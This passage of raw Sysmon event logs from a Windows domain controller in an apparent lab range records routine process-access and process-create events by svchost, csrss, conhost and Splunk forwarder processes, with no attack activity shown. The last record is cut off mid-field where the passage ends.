{"EventTime":"2020-08-01 08:03:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6597,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:44.742\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:44.742","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6598,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:44.742\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-21E0-5F25-0000-00107B300A00}\r\nTargetProcessId: 4416\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:44.742","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-21E0-5F25-0000-00107B300A00}","TargetProcessId":"4416","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6599,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:44.882\r\nSourceProcessGUID: {41C8662E-21E0-5F25-0000-00107B300A00}\r\nSourceProcessId: 4416\r\nSourceThreadId: 1164\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:44.882","SourceProcessGUID":"{41C8662E-21E0-5F25-0000-00107B300A00}","SourceProcessId":"4416","SourceThreadId":"1164","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6600,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:45.805\r\nProcessGuid: {41C8662E-21E1-5F25-0000-0010B7320A00}\r\nProcessId: 3376\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Windows Print Monitor \r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-winprintmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:03:45.805","ProcessGuid":"{41C8662E-21E1-5F25-0000-0010B7320A00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","FileVersion":"8.0.2","Description":"Windows Print Monitor ","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-winprintmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6601,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:45.804\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-21E1-5F25-0000-0010B7320A00}\r\nTargetProcessId: 3376\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:45.804","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-21E1-5F25-0000-0010B7320A00}","TargetProcessId":"3376","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6602,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:45.804\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21E1-5F25-0000-0010B7320A00}\r\nTargetProcessId: 3376\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:45.804","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21E1-5F25-0000-0010B7320A00}","TargetProcessId":"3376","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6603,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:45.804\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:45.804","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6604,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:45.804\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:45.804","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6605,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:45.804\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:45.804","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+